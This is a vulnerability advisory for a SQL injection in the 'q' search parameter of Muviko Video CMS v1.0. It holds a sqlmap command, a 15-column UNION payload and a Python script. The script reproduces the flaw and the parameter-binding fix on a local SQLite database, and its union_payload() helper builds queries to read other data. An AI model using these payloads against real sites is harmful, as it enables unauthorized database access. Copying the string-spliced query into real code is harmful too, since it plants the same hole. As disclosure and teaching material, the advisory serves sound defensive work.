Vendor: Muviko Video CMS
By: Kaan KAMIS
CVSS: 9 (CRITICAL)
Vulnerability Type: SQL Injection
CWE: 89
Product Name: Muviko Video CMS
Affected Version From: Muviko Video CMS v1.0
Affected Version To: Muviko Video CMS v1.0
Patch Exists: NO
Related CWE:
CPE: a:muvikoscript:muviko:1.0
Metasploit:
Other Scripts:
Platforms Tested:
Year: 2017

Muviko – Video CMS v1.0 – ‘q’ Parameter SQL Injection

The 'q' parameter of search.php in Muviko Video CMS v1.0 is placed into a SQL query without sanitization or parameter binding, so an attacker can inject SQL through it. The sqlmap output below confirms a UNION-based injection returning 15 columns, which lets an attacker read arbitrary data from the application's database; depending on the privileges of the database account the application uses, modifying or deleting data may also be possible.

Mitigation:

The primary fix is to pass the search term to the database as a bound parameter (prepared statements or parameterized queries) rather than splicing it into the SQL text. Validating and length-limiting user input is useful defence in depth but is not a substitute for parameter binding. No vendor patch is listed for v1.0.

Exploit-DB raw data:

Exploit Title: Muviko - Video CMS v1.0 – 'q' Parameter SQL Injection
Date: 02.08.2017
Vendor Homepage: https://muvikoscript.com/
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits

Overview
Muviko is a movie and video content management system: powerful, scalable and multi-purpose. It has been built from the ground up to provide users with an excellent experience. Users can subscribe to watch your videos and earn you money. You choose which of your videos require users to subscribe and which are free. You can also earn money from ads.


Vulnerable Url: https://localhost/search.php?q=[payload]

Sqlmap Example: sqlmap.py -u "https://localhost/search.php?q=star" --cookie="PHPSESSID=ipqrq203upp0kshdetjgn2hk12; _ga=GA1.2.1947531638.1501703867; _gid=GA1.2.1749506565.1501703867; _gat=1"

(The cookie values above are those of the author's test session; substitute your own PHPSESSID when reproducing.)

---
Parameter: q (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: q=test' UNION ALL SELECT NULL,CONCAT(CONCAT('qqpzq','lHGBmBgXqPlXdkuRCaimornRFWRUtWPKLWYLzQeK'),'qqvvq'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Gqvt
---
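The following Python script is an added example, not part of the advisory or of Muviko's own code. It reconstructs the flaw described in the summary and confirmed by the sqlmap output above, and the parameter-binding fix from the mitigation section, against an in-memory SQLite database. Everything about the application side is assumed: the table name, its 15-column shape (taken only from the fact that sqlmap's UNION needed 15 NULLs), the sample rows, and the way search.php splices the term into its query (the real application is PHP, presumably with MySQL). CONCAT is registered by hand because SQLite lacks it, so the page's payload runs unchanged. The union_payload() helper goes beyond the page by showing how the same injection point is reused to read other data from the database.

```python
import re
import sqlite3

# Constructed stand-in for the application's table. The advisory only tells us the
# query behind search.php returns 15 columns; names and rows are invented here.
COLUMNS = ["id", "title"] + [f"col{i}" for i in range(3, 16)]   # 15 columns
SAMPLE_VIDEOS = [
    (1, "Star Wars", *[None] * 13),
    (2, "A Star Is Born", *[None] * 13),
    (3, "Inception", *[None] * 13),
]

# sqlmap's UNION payload exactly as reported on the page: column 2 carries a random
# string wrapped in the random markers 'qqpzq' / 'qqvvq' that sqlmap later looks for.
PAYLOAD = (
    "test' UNION ALL SELECT NULL,"
    "CONCAT(CONCAT('qqpzq','lHGBmBgXqPlXdkuRCaimornRFWRUtWPKLWYLzQeK'),'qqvvq'),"
    + ",".join(["NULL"] * 13) + "-- Gqvt"
)
MARKER_RE = re.compile(r"qqpzq(.*?)qqvvq", re.S)


def open_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    # SQLite has no CONCAT(); register a two-argument one so the MySQL-style payload parses.
    conn.create_function("CONCAT", 2, lambda a, b: f"{a}{b}")
    conn.execute(f"CREATE TABLE videos ({', '.join(COLUMNS)})")
    conn.executemany(f"INSERT INTO videos VALUES ({', '.join('?' * 15)})", SAMPLE_VIDEOS)
    return conn


def search_vulnerable(q: str) -> list[tuple]:
    # Hypothetical reconstruction of the flaw: the search term becomes part of the SQL text,
    # so a closing quote in q ends the LIKE pattern and the rest is executed as SQL.
    sql = f"SELECT {', '.join(COLUMNS)} FROM videos WHERE title LIKE '%{q}%'"
    return open_db().execute(sql).fetchall()


def search_safe(q: str) -> list[tuple]:
    # Hardened form: the term travels as a bound parameter and can never alter the statement.
    sql = f"SELECT {', '.join(COLUMNS)} FROM videos WHERE title LIKE ?"
    return open_db().execute(sql, (f"%{q}%",)).fetchall()


def extract_marked(rows: list[tuple]) -> list[str]:
    # What sqlmap does with the HTTP response: pull every value found between its markers.
    found = []
    for row in rows:
        for cell in row:
            if isinstance(cell, str):
                found.extend(MARKER_RE.findall(cell))
    return found


def union_payload(expr: str) -> str:
    # Beyond the page: reuse the confirmed 15-column injection point to return any scalar
    # SQL expression, wrapped in the same markers so extract_marked() can read it back.
    return ("x' UNION ALL SELECT NULL,CONCAT(CONCAT('qqpzq',(" + expr + ")),'qqvvq'),"
            + ",".join(["NULL"] * 13) + "-- ")


if __name__ == "__main__":
    print("vulnerable, page payload :", extract_marked(search_vulnerable(PAYLOAD)))
    print("vulnerable, row count     :", extract_marked(search_vulnerable(union_payload("SELECT count(*) FROM videos"))))
    print("parameterized, same input :", search_safe(PAYLOAD))
    print("parameterized, normal use :", [r[1] for r in search_safe("star")])
```

Running the script shows the marker string coming back through the vulnerable query (which is how sqlmap decides the UNION works) and nothing at all coming back through the parameterized one, while an ordinary search for "star" behaves identically in both. One caveat the bound version does not address: '%' and '_' typed into q still act as LIKE wildcards, which is an input-validation matter separate from injection.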